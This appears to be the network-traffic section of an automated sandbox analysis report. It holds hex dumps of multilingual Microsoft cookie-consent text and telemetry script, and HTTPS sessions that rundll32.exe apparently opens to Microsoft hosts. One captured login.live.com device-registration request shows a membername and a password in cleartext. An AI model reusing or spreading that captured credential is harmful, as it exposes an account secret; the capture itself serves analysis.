                                                                                                                                                                                    Data Ascii: eklamos slapukai",desc:"Mes kartu su treiosiomis alimis reklamos ir rinkodaros slapukus naudojame tam, kad rodytume naujas reklamas raydami, kurias reklamas jau matte. Jie taip pat naudojami siekiant sekti, kurias reklamas spustelite arba k pe
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14979INData Raw: 65 63 74 41 6c 6c 4c 61 62 65 6c 3a 22 49 72 72 69 66 6a 75 74 61 22 2c 6d 6f 72 65 49 6e 66 6f 4c 61 62 65 6c 3a 22 49 6d 6d 61 6e 69 c4 a1 c4 a1 6a 61 20 6c 2d 63 6f 6f 6b 69 65 73 22 2c 70 72 65 66 65 72 65 6e 63 65 73 44 69 61 6c 6f 67 43 6c 6f 73 65 4c 61 62 65 6c 3a 22 41 67 c4 a7 6c 61 71 22 2c 70 72 65 66 65 72 65 6e 63 65 73 44 69 61 6c 6f 67 54 69 74 6c 65 3a 22 49 6d 6d 61 6e 69 c4 a1 c4 a1 6a 61 20 6c 2d 50 72 65 66 65 72 65 6e 7a 69 20 74 61 6c 2d 43 6f 6f 6b 69 65 73 22 2c 70 72 65 66 65 72 65 6e 63 65 73 44 69 61 6c 6f 67 44 65 73 63 48 74 6d 6c 3a 22 c4 a6 61 66 6e 61 20 6d 69 6c 6c 2d 77 65 62 73 6a 61 6a 74 73 20 74 61 27 20 4d 69 63 72 6f 73 6f 66 74 20 6a 75 c5 bc 61 77 20 63 6f 6f 6b 69 65 73 2e 20 43 6f 6f 6b 69 65 73 20 68 75 6d 61
                                                                                                                                                                                    Data Ascii: ectAllLabel:"Irrifjuta",moreInfoLabel:"Immanija l-cookies",preferencesDialogCloseLabel:"Aglaq",preferencesDialogTitle:"Immanija l-Preferenzi tal-Cookies",preferencesDialogDescHtml:"afna mill-websjajts ta' Microsoft juaw cookies. Cookies huma
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14987INData Raw: 20 76 61 6e 20 76 65 72 65 69 73 74 65 20 63 6f 6f 6b 69 65 73 20 6f 6d 20 65 73 73 65 6e 74 69 c3 ab 6c 65 20 77 65 62 73 69 74 65 66 75 6e 63 74 69 65 73 20 74 65 20 6c 61 74 65 6e 20 77 65 72 6b 65 6e 2e 20 5a 65 20 77 6f 72 64 65 6e 20 62 69 6a 76 6f 6f 72 62 65 65 6c 64 20 67 65 62 72 75 69 6b 74 20 6f 6d 20 6a 65 20 61 61 6e 20 74 65 20 6d 65 6c 64 65 6e 2c 20 6a 65 20 74 61 61 6c 76 6f 6f 72 6b 65 75 72 65 6e 20 6f 70 20 74 65 20 73 6c 61 61 6e 2c 20 6a 65 20 77 69 6e 6b 65 6c 65 72 76 61 72 69 6e 67 20 74 65 20 76 65 72 62 65 74 65 72 65 6e 2c 20 70 72 65 73 74 61 74 69 65 73 20 74 65 20 76 65 72 68 6f 67 65 6e 2c 20 76 65 72 6b 65 65 72 20 74 75 73 73 65 6e 20 77 65 62 73 65 72 76 65 72 73 20 74 65 20 72 65 67 65 6c 65 6e 2c 20 64 65 20 67 72 6f
                                                                                                                                                                                    Data Ascii: van vereiste cookies om essentile websitefuncties te laten werken. Ze worden bijvoorbeeld gebruikt om je aan te melden, je taalvoorkeuren op te slaan, je winkelervaring te verbeteren, prestaties te verhogen, verkeer tussen webservers te regelen, de gro
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14995INData Raw: c4 87 20 69 20 75 64 6f 73 6b 6f 6e 61 6c 61 c4 87 20 73 77 6f 6a 65 20 70 72 6f 64 75 6b 74 79 2c 20 61 20 6e 61 73 74 c4 99 70 6e 69 65 20 75 c5 bc 79 77 61 c4 87 20 69 63 68 20 77 20 77 69 74 72 79 6e 61 63 68 2c 20 6b 74 c3 b3 72 65 20 6e 69 65 20 6e 61 6c 65 c5 bc c4 85 20 64 6f 20 66 69 72 6d 79 20 4d 69 63 72 6f 73 6f 66 74 20 69 20 6e 69 65 20 73 c4 85 20 70 72 7a 65 7a 20 6e 69 c4 85 20 6f 62 73 c5 82 75 67 69 77 61 6e 65 2e 20 4e 61 20 70 72 7a 79 6b c5 82 61 64 20 67 72 6f 6d 61 64 7a 69 6d 79 20 77 20 74 65 6e 20 73 70 6f 73 c3 b3 62 20 64 61 6e 65 20 6f 20 6f 64 77 69 65 64 7a 61 6e 79 63 68 20 73 74 72 6f 6e 61 63 68 20 69 20 6c 69 63 7a 62 69 65 20 6b 6c 69 6b 6e 69 c4 99 c4 87 20 70 6f 74 72 7a 65 62 6e 79 63 68 20 64 6f 20 77 79 6b 6f 6e
                                                                                                                                                                                    Data Ascii: i udoskonala swoje produkty, a nastpnie uywa ich w witrynach, ktre nie nale do firmy Microsoft i nie s przez ni obsugiwane. Na przykad gromadzimy w ten sposb dane o odwiedzanych stronach i liczbie klikni potrzebnych do wykon
                                                                                                                                                                                    2023-01-05 07:58:52 UTC15003INData Raw: 20 74 65 72 63 65 69 72 6f 73 2c 20 63 6f 6f 6b 69 65 73 20 64 65 20 70 75 62 6c 69 63 69 64 61 64 65 20 65 20 6d 61 72 6b 65 74 69 6e 67 20 70 61 72 61 20 6c 68 65 20 6d 6f 73 74 72 61 72 20 6e 6f 76 6f 73 20 61 6e c3 ba 6e 63 69 6f 73 2c 20 72 65 67 69 73 74 61 6e 64 6f 20 6f 73 20 61 6e c3 ba 6e 63 69 6f 73 20 71 75 65 20 6a c3 a1 20 76 69 75 2e 20 54 61 6d 62 c3 a9 6d 20 73 c3 a3 6f 20 75 74 69 6c 69 7a 61 64 6f 73 20 70 61 72 61 20 6d 6f 6e 69 74 6f 72 69 7a 61 72 20 6f 73 20 61 6e c3 ba 6e 63 69 6f 73 20 65 6d 20 71 75 65 20 63 6c 69 63 61 20 6f 75 20 61 73 20 63 6f 6d 70 72 61 73 20 71 75 65 20 66 61 7a 20 64 65 70 6f 69 73 20 64 65 20 63 6c 69 63 61 72 20 6e 75 6d 20 61 6e c3 ba 6e 63 69 6f 2c 20 70 61 72 61 20 65 66 65 69 74 6f 73 20 64 65 20 70
                                                                                                                                                                                    Data Ascii: terceiros, cookies de publicidade e marketing para lhe mostrar novos anncios, registando os anncios que j viu. Tambm so utilizados para monitorizar os anncios em que clica ou as compras que faz depois de clicar num anncio, para efeitos de p
                                                                                                                                                                                    2023-01-05 07:58:52 UTC15011INData Raw: 74 65 22 2c 64 65 73 63 3a 22 4e 6f 69 20 c8 99 69 20 74 65 72 c8 9b 69 69 20 66 6f 6c 6f 73 69 6d 20 6d 6f 64 75 6c 65 20 63 6f 6f 6b 69 65 20 64 65 20 70 75 62 6c 69 63 69 74 61 74 65 20 70 65 6e 74 72 75 20 61 20 61 66 69 c8 99 61 20 61 6e 75 6e c8 9b 75 72 69 20 6e 6f 69 2c 20 c3 ae 6e 72 65 67 69 73 74 72 c3 a2 6e 64 20 61 6e 75 6e c8 9b 75 72 69 6c 65 20 70 65 20 63 61 72 65 20 6c 65 2d 61 c8 9b 69 20 76 c4 83 7a 75 74 20 64 65 6a 61 2e 20 44 65 20 61 73 65 6d 65 6e 65 61 2c 20 73 75 6e 74 20 75 74 69 6c 69 7a 61 74 65 20 70 65 6e 74 72 75 20 61 20 75 72 6d c4 83 72 69 20 61 6e 75 6e c8 9b 75 72 69 6c 65 20 70 65 20 63 61 72 65 20 66 61 63 65 c8 9b 69 20 63 6c 69 63 20 73 61 75 20 61 63 68 69 7a 69 c8 9b 69 69 6c 65 20 70 65 20 63 61 72 65 20 6c 65
                                                                                                                                                                                    Data Ascii: te",desc:"Noi i terii folosim module cookie de publicitate pentru a afia anunuri noi, nregistrnd anunurile pe care le-ai vzut deja. De asemenea, sunt utilizate pentru a urmri anunurile pe care facei clic sau achiziiile pe care le
                                                                                                                                                                                    2023-01-05 07:58:52 UTC15019INData Raw: 65 6e c3 ad 2c 20 70 6f 6d c3 a1 68 61 6a c3 ba 20 76 c3 a1 6d 20 70 72 69 68 6c c3 a1 73 69 c5 a5 20 73 61 2c 20 7a 6f 62 72 61 7a 6f 76 61 c5 a5 20 70 72 69 73 70 c3 b4 73 6f 62 65 6e c3 a9 20 72 65 6b 6c 61 6d 79 20 61 20 61 6e 61 6c 79 7a 6f 76 61 c5 a5 2c 20 61 6b 6f 20 64 6f 62 72 65 20 6e 61 c5 a1 65 20 77 65 62 79 20 66 75 6e 67 75 6a c3 ba 2e 20 c4 8e 61 6c c5 a1 69 65 20 69 6e 66 6f 72 6d c3 a1 63 69 65 20 6e c3 a1 6a 64 65 74 65 20 76 20 c4 8d 61 73 74 69 20 53 c3 ba 62 6f 72 79 20 63 6f 6f 6b 69 65 20 61 20 70 6f 64 6f 62 6e c3 a9 20 74 65 63 68 6e 6f 6c c3 b3 67 69 65 20 76 6f 20 3c 61 20 74 61 72 67 65 74 3d 27 5f 62 6c 61 6e 6b 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e
                                                                                                                                                                                    Data Ascii: en, pomhaj vm prihlsi sa, zobrazova prispsoben reklamy a analyzova, ako dobre nae weby funguj. alie informcie njdete v asti Sbory cookie a podobn technolgie vo <a target='_blank' href='https://go.microsoft.com/fwlin
                                                                                                                                                                                    2023-01-05 07:58:52 UTC15027INData Raw: 6a 61 20 6b 6f 72 70 6f 72 61 63 69 6a 61 20 4d 69 63 72 6f 73 6f 66 74 20 69 20 6b 6f 6a 65 20 6e 69 73 75 20 75 20 6e 6a 65 6e 6f 6d 20 76 6c 61 73 6e 69 c5 a1 74 76 75 2e 20 4e 61 20 70 72 69 6d 65 72 2c 20 6f 6e 69 20 73 65 20 6b 6f 72 69 73 74 65 20 7a 61 20 70 72 69 6b 75 70 6c 6a 61 6e 6a 65 20 69 6e 66 6f 72 6d 61 63 69 6a 61 20 6f 20 73 74 72 61 6e 69 63 61 6d 61 20 6b 6f 6a 65 20 70 6f 73 65 c4 87 75 6a 65 74 65 20 69 20 6f 20 74 6f 6d 65 20 6b 6f 6c 69 6b 6f 20 6a 65 20 6b 6c 69 6b 6f 76 61 20 70 6f 74 72 65 62 6e 6f 20 7a 61 20 69 7a 76 72 c5 a1 61 76 61 6e 6a 65 20 7a 61 64 61 74 6b 61 2e 20 4f 64 72 65 c4 91 65 6e 65 20 6b 6f 6c 61 c4 8d 69 c4 87 65 20 61 6e 61 6c 69 74 69 6b 65 20 6b 6f 72 69 73 74 69 6d 6f 20 7a 61 20 72 65 6b 6c 61 6d 69
                                                                                                                                                                                    Data Ascii: ja korporacija Microsoft i koje nisu u njenom vlasnitvu. Na primer, oni se koriste za prikupljanje informacija o stranicama koje poseujete i o tome koliko je klikova potrebno za izvravanje zadatka. Odreene kolaie analitike koristimo za reklami
                                                                                                                                                                                    2023-01-05 07:58:52 UTC15035INData Raw: e0 b8 99 20 e0 b8 81 e0 b8 b2 e0 b8 a3 e0 b9 83 e0 b8 8a e0 b9 89 e0 b8 84 e0 b8 b8 e0 b8 81 e0 b8 81 e0 b8 b5 e0 b9 89 e0 b9 80 e0 b8 9e e0 b8 b7 e0 b9 88 e0 b8 ad e0 b8 99 e0 b8 b3 e0 b8 84 e0 b8 b8 e0 b8 93 e0 b9 80 e0 b8 82 e0 b9 89 e0 b8 b2 e0 b8 aa e0 b8 b9 e0 b9 88 e0 b8 a3 e0 b8 b0 e0 b8 9a e0 b8 9a 20 e0 b8 9a e0 b8 b1 e0 b8 99 e0 b8 97 e0 b8 b6 e0 b8 81 e0 b8 81 e0 b8 b2 e0 b8 a3 e0 b8 81 e0 b8 b3 e0 b8 ab e0 b8 99 e0 b8 94 e0 b8 a5 e0 b8 b1 e0 b8 81 e0 b8 a9 e0 b8 93 e0 b8 b0 e0 b8 a0 e0 b8 b2 e0 b8 a9 e0 b8 b2 e0 b8 82 e0 b8 ad e0 b8 87 e0 b8 84 e0 b8 b8 e0 b8 93 20 e0 b8 a1 e0 b8 ad e0 b8 9a e0 b8 9b e0 b8 a3 e0 b8 b0 e0 b8 aa e0 b8 9a e0 b8 81 e0 b8 b2 e0 b8 a3 e0 b8 93 e0 b9 8c e0 b8 81 e0 b8 b2 e0 b8 a3 e0 b9 83 e0 b8 8a e0 b9 89 e0 b8 87
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:58:52 UTC15043INData Raw: b1 20 76 65 79 61
                                                                                                                                                                                    Data Ascii: veya
                                                                                                                                                                                    2023-01-05 07:58:52 UTC15043INData Raw: 20 74 c4 b1 6b 6c 61 64 c4 b1 6b 74 61 6e 20 73 6f 6e 72 61 20 67 65 72 c3 a7 65 6b 6c 65 c5 9f 65 6e 20 73 61 74 c4 b1 6e 20 61 6c c4 b1 6d 6c 61 72 c4 b1 6e c4 b1 7a c4 b1 20 69 7a 6c 65 6d 65 6b 20 76 65 20 73 69 7a 65 20 64 61 68 61 20 61 6c 61 6b 61 6c c4 b1 20 72 65 6b 6c 61 6d 6c 61 72 20 67 c3 b6 73 74 65 72 6d 65 6b 20 69 c3 a7 69 6e 20 64 65 20 6b 75 6c 6c 61 6e c4 b1 6c c4 b1 72 2e 20 42 75 20 62 69 6c 67 69 6c 65 72 20 c3 b6 72 6e 65 c4 9f 69 6e 20 62 69 72 20 72 65 6b 6c 61 6d 61 20 74 c4 b1 6b 6c 61 64 c4 b1 c4 9f c4 b1 6e c4 b1 7a c4 b1 20 61 6c 67 c4 b1 6c 61 6d 61 6b 20 76 65 20 73 6f 73 79 61 6c 20 6d 65 64 79 61 64 61 6b 69 20 69 6c 67 69 20 61 6c 61 6e 6c 61 72 c4 b1 6e c4 b1 7a 61 20 76 65 20 77 65 62 20 73 69 74 65 73 69 20 74 61 72
                                                                                                                                                                                    Data Ascii: tkladktan sonra gerekleen satn almlarnz izlemek ve size daha alakal reklamlar gstermek iin de kullanlr. Bu bilgiler rnein bir reklama tkladnz alglamak ve sosyal medyadaki ilgi alanlarnza ve web sitesi tar
                                                                                                                                                                                    2023-01-05 07:58:52 UTC15051INData Raw: 3a 22 43 68 e1 ba a5 70 20 6e 68 e1 ba ad 6e 22 2c 72 65 6a 65 63 74 4c 61 62 65 6c 3a 22 54 e1 bb ab 20 63 68 e1 bb 91 69 22 2c 73 61 76 65 4c 61 62 65 6c 3a 22 4c c6 b0 75 20 74 68 61 79 20 c4 91 e1 bb 95 69 22 2c 72 65 73 65 74 4c 61 62 65 6c 3a 22 c4 90 e1 ba b7 74 20 6c e1 ba a1 69 20 74 e1 ba a5 74 20 63 e1 ba a3 22 2c 63 61 74 65 67 6f 72 69 65 73 3a 5b 7b 69 64 3a 22 63 30 22 2c 6e 61 6d 65 3a 22 42 e1 ba af 74 20 62 75 e1 bb 99 63 22 2c 64 65 73 63 3a 22 43 68 c3 ba 6e 67 20 74 c3 b4 69 20 73 e1 bb ad 20 64 e1 bb a5 6e 67 20 63 6f 6f 6b 69 65 20 62 e1 ba af 74 20 62 75 e1 bb 99 63 20 c4 91 e1 bb 83 20 74 68 e1 bb b1 63 20 68 69 e1 bb 87 6e 20 63 c3 a1 63 20 63 68 e1 bb a9 63 20 6e c4 83 6e 67 20 63 e1 ba a7 6e 20 74 68 69 e1 ba bf 74 20 63 e1 bb
                                                                                                                                                                                    Data Ascii: :"Chp nhn",rejectLabel:"T chi",saveLabel:"Lu thay i",resetLabel:"t li tt c",categories:[{id:"c0",name:"Bt buc",desc:"Chng ti s dng cookie bt buc thc hin cc chc nng cn thit c
                                                                                                                                                                                    2023-01-05 07:58:52 UTC15059INData Raw: 65 73 2e 20 54 68 65 79 e2 80 99 72 65 20 75 73 65 64 20 74 6f 20 63 6f 6e 6e 65 63 74 20 79 6f 75 72 20 61 63 74 69 76 69 74 79 20 6f 6e 20 6f 75 72 20 77 65 62 73 69 74 65 73 20 74 6f 20 79 6f 75 72 20 73 6f 63 69 61 6c 20 6d 65 64 69 61 20 70 72 6f 66 69 6c 65 73 20 73 6f 20 74 68 65 20 61 64 73 20 61 6e 64 20 63 6f 6e 74 65 6e 74 20 79 6f 75 20 73 65 65 20 6f 6e 20 6f 75 72 20 77 65 62 73 69 74 65 73 20 61 6e 64 20 6f 6e 20 73 6f 63 69 61 6c 20 6d 65 64 69 61 20 77 69 6c 6c 20 62 65 74 74 65 72 20 72 65 66 6c 65 63 74 20 79 6f 75 72 20 69 6e 74 65 72 65 73 74 73 2e 20 22 7d 2c 7b 69 64 3a 22 63 33 22 2c 6e 61 6d 65 3a 22 41 64 76 65 72 74 69 73 69 6e 67 22 2c 64 65 73 63 3a 22 57 65 20 61 6e 64 20 74 68 69 72 64 20 70 61 72 74 69 65 73 20 75 73 65 20
                                                                                                                                                                                    Data Ascii: es. Theyre used to connect your activity on our websites to your social media profiles so the ads and content you see on our websites and on social media will better reflect your interests. "},{id:"c3",name:"Advertising",desc:"We and third parties use


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    49192.168.2.44980013.107.237.60443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14739OUTGET /scripts/c/ms.jsll-3.min.js HTTP/1.1
                                                                                                                                                                                    Host: js.monitor.azure.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                    Referer: https://learn.microsoft.com/
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    5192.168.2.44970020.190.159.22443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:00 UTC103OUTPOST /ppsecure/deviceaddcredential.srf HTTP/1.0
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                    Content-Length: 7598
                                                                                                                                                                                    Host: login.live.com
                                                                                                                                                                                    2023-01-05 07:57:00 UTC103OUTData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 71 75 65 73 74 3e 3c 43 6c 69 65 6e 74 49 6e 66 6f 20 6e 61 6d 65 3d 22 49 44 43 52 4c 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 3c 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 31 38 3c 2f 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 3c 2f 43 6c 69 65 6e 74 49 6e 66 6f 3e 3c 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 6d 67 6f 6e 62 65 6d 71 68 64 79 79 74 61 3c 2f 4d 65 6d 62 65 72 6e 61 6d 65 3e 3c 50 61 73 73 77 6f 72 64 3e 6a 41 48 2c 30 68 79 6a 66 7a 47 43 57 7a 6d 2b 47 2f 79 74 3c 2f 50 61 73 73 77 6f 72 64 3e 3c 2f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4f 6c 64 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 65 7a 66 6f 71 61 71 70 63 75 78 69 6a 73 3c 2f 4f 6c 64 4d
                                                                                                                                                                                    Data Ascii: <DeviceAddRequest><ClientInfo name="IDCRL" version="1.0"><BinaryVersion>18</BinaryVersion></ClientInfo><Authentication><Membername>02mgonbemqhdyyta</Membername><Password>jAH,0hyjfzGCWzm+G/yt</Password></Authentication><OldMembername>02ezfoqaqpcuxijs</OldM
                                                                                                                                                                                    2023-01-05 07:57:02 UTC111INHTTP/1.1 200 OK
                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Expires: Thu, 05 Jan 2023 07:56:00 GMT
                                                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                    x-ms-route-info: R3_BL2
                                                                                                                                                                                    x-ms-request-id: 69a95823-fd2e-4e71-97f4-6cdbdd7ec53d
                                                                                                                                                                                    PPServer: PPV: 30 H: BL02PFACB7B875B V: 0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:02 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 17166
                                                                                                                                                                                    2023-01-05 07:57:02 UTC111INData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 73 70 6f 6e 73 65 20 53 75 63 63 65 73 73 3d 22 74 72 75 65 22 3e 3c 73 75 63 63 65 73 73 3e 74 72 75 65 3c 2f 73 75 63 63 65 73 73 3e 3c 70 75 69 64 3e 30 30 31 38 38 30 30 39 41 32 41 43 31 36 38 33 3c 2f 70 75 69 64 3e 3c 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 33 3c 2f 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 3c 4c 69 63 65 6e 73 65 20 43 6f 6e 74 65 6e 74 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 2d 38 63 63 35 2d 62 32 66 35 33 63 38 33 30 62 37 36 22 20 49 44 3d 22 35 37 31 63 65 65 33 32 2d 34 31 61 34 2d 34 64 62 39 2d 38 65 66 65 2d 30 64 30 34 64 39 37 65 64 35 36 62 22 20 4c 69 63 65 6e 73 65 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31
                                                                                                                                                                                    Data Ascii: <DeviceAddResponse Success="true"><success>true</success><puid>00188009A2AC1683</puid><DeviceTpmKeyState>3</DeviceTpmKeyState><License ContentID="3252b20c-d425-4711-8cc5-b2f53c830b76" ID="571cee32-41a4-4db9-8efe-0d04d97ed56b" LicenseID="3252b20c-d425-4711
                                                                                                                                                                                    2023-01-05 07:57:02 UTC127INData Raw: 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 65 6e 76 65 6c 6f 70 65 64 2d 73 69 67 6e 61 74 75 72 65 22 2f 3e 3c 2f 54 72 61 6e 73 66 6f 72 6d 73 3e 3c 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 30 34 2f 78 6d 6c 65 6e 63 23 73 68 61 32 35 36 22 2f 3e 3c 44 69 67 65 73 74 56 61 6c 75 65 3e 67 74 71 77 70 52 35 66 47 44 61 6f 48 73 4d 37 49 57 47 4b 5a 67 61 77 58 61 30 42 50 69 47 61 65 35 62 49 75 6e 2f 52 51 4a 41 3d 3c 2f 44 69 67 65 73 74 56 61 6c 75 65 3e 3c 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 41 46 38 6f 46 52 2b 47 66 38 53
                                                                                                                                                                                    Data Ascii: ://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><DigestValue>gtqwpR5fGDaoHsM7IWGKZgawXa0BPiGae5bIun/RQJA=</DigestValue></Reference></SignedInfo><SignatureValue>AF8oFR+Gf8S


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    5013.107.237.60443192.168.2.449800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14795INHTTP/1.1 200 OK
                                                                                                                                                                                    Cache-Control: public, max-age=1800, immutable, no-transform
                                                                                                                                                                                    Content-Length: 182921
                                                                                                                                                                                    Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                    Content-MD5: yrkf9GZ1Xvz6HYOCdF/nTw==
                                                                                                                                                                                    Last-Modified: Wed, 02 Nov 2022 19:31:15 GMT
                                                                                                                                                                                    ETag: 0x8DABD08CF2EB3C0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    x-ms-request-id: eab971a6-801e-006e-6ad6-2078b4000000
                                                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                                                    x-ms-meta-jssdkver: 3.2.8
                                                                                                                                                                                    x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-3.2.8.min.js
                                                                                                                                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    X-Azure-Ref-OriginShield: 0oX22YwAAAAC8JSVF9AEfSbvEghyYNZWPRlJBMjMxMDUwNDE4MDExAGYxY2E3M2Q0LTg4ODMtNGNhZi1hYmRjLWZlMmQ1NjdhZmI5Ng==
                                                                                                                                                                                    X-Azure-Ref: 0PIO2YwAAAAA39XYAkOgVTIc3Qc1EIdWwRlJBMzFFREdFMDMxMwBmMWNhNzNkNC04ODgzLTRjYWYtYWJkYy1mZTJkNTY3YWZiOTY=
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:58:52 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14796INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 33 2e 32 2e 38 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 76 61 72 20 65 3d 74 68 69 73 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 66 3d 22 66 75 6e 63 74 69 6f 6e 22 2c 64 3d 22 6f 62 6a 65 63 74 22 2c 66 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 2c 7a 3d 22 70 72 6f 74 6f 74 79 70 65 22 2c 67 3d 22 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 22 2c 68 3d 4f 62 6a 65 63 74 2c 79 3d 68 5b 7a 5d
                                                                                                                                                                                    Data Ascii: /*! * 1DS JSLL SKU, 3.2.8 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */var e=this,t=function(l){"use strict";var f="function",d="object",fe="undefined",z="prototype",g="hasOwnProperty",h=Object,y=h[z]
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14883INData Raw: 22 2c 6f 69 3d 22 5f 63 6b 4d 67 72 22 2c 73 69 3d 6e 75 6c 6c 2c 63 69 3d 6e 75 6c 6c 2c 75 69 3d 6e 75 6c 6c 2c 6c 69 3d 6f 65 28 29 2c 66 69 3d 7b 7d 2c 64 69 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 70 69 28 65 29 7b 72 65 74 75 72 6e 21 65 7c 7c 65 2e 69 73 45 6e 61 62 6c 65 64 28 29 7d 66 75 6e 63 74 69 6f 6e 20 67 69 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 26 26 65 26 26 56 28 65 2e 69 67 6e 6f 72 65 43 6f 6f 6b 69 65 73 29 26 26 2d 31 21 3d 3d 65 2e 69 67 6e 6f 72 65 43 6f 6f 6b 69 65 73 5b 6b 5d 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 76 69 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3b 72 65 74 75 72 6e 20 65 3f 6e 3d 65 2e 67 65 74 43 6f 6f 6b 69 65 4d 67 72 28 29 3a 74 26 26 28 6e 3d 74 5b 41 5d 5b 6f 69 5d 7c 7c 68 69 28 74 29 29 2c 6e 7c 7c 28 65
